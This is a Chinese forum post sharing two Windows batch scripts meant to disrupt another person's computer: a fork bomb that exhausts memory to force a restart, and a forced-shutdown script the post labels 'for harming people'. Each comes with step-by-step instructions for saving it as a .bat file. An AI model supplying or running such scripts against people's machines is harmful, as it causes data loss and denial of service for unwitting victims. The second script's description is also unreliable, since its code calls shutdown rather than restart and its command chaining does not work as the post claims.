第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0
就这3行了
打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:1.txt echo. >c:1.txt ; goto err1
if not exist c:2.txt echo. >c:2.txt ; goto err1
if not exist c:3.txt echo. >c:3.txt ; goto err1
if not exist c:4.txt echo. >c:4.txt ; goto err1
if not exist c:5.txt echo. >c:5.txt ; goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt ; goto err1那就是重启6次
改成7就是7次...
打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
[ 此帖被五个半酸柠檬在2014-11-30 00:15重新编辑 ]